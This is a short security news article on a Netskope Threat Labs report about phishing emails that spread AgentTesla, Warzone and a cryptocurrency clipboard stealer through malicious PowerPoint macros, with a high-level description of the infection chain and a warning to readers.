Netskope Threat Labs has documented a campaign that is active since late last year, that’s spreading RATs through PowerPoint files.
Three prominent stealers – AgentTesla, Warzone, and a cryptocurrency stealer is seen distributed through emails, containing malicious PowerPoint files. Researchers warned people to beware of clicking any suspicious files and responding to anything that came from untrusted sources.
RATs Stealing Data and Money
Researchers at Netskope Threat Labs have reported on a malicious email campaign, that they’re tracking since last year. Picking up the pace in December 2021, the campaign is seen delivering malicious PowerPoint files that contain popular remote access trojans (RATs).
There are three instances on which the researchers noted. In the first one, PowerPoint files carrying the AgentTesla trojan were spotted! This file contains an obfuscated macro that uses two most legitimate windows tools – PowerShell and MSHTA for executing on the victim machine.
And then there’s a VBS script that unpacks to open two more functions – disabling the Windows Defender, and create a scheduled task to run the trojan every hour, and fetch in a cryptocurrency stealer from a Blogger URL.
The second instance is where another RAT named Warzone is being distributed. Netskope researchers haven’t detailed this much but mentioned it being as powerful as the AgentTesla, which is capable of logging keystrokes, stealing clipboard data, etc.
And in the final instance, there’s a cryptocurrency stealer that can replace the wallet addresses of Bitcoin, Ethereum, XMR, DOGE, and more from the victim’s clipboard, with that of hackers to divert the funds. So, it’s advised by the researchers to remain vigilant in responding to such malicious emails and files, which carry possible stealers.
Netskope researchers have shared the indicators of the compromised and the cryptocurrency wallet addresses belonging to threat actors of this campaign, for awareness.
Other Trending News:- News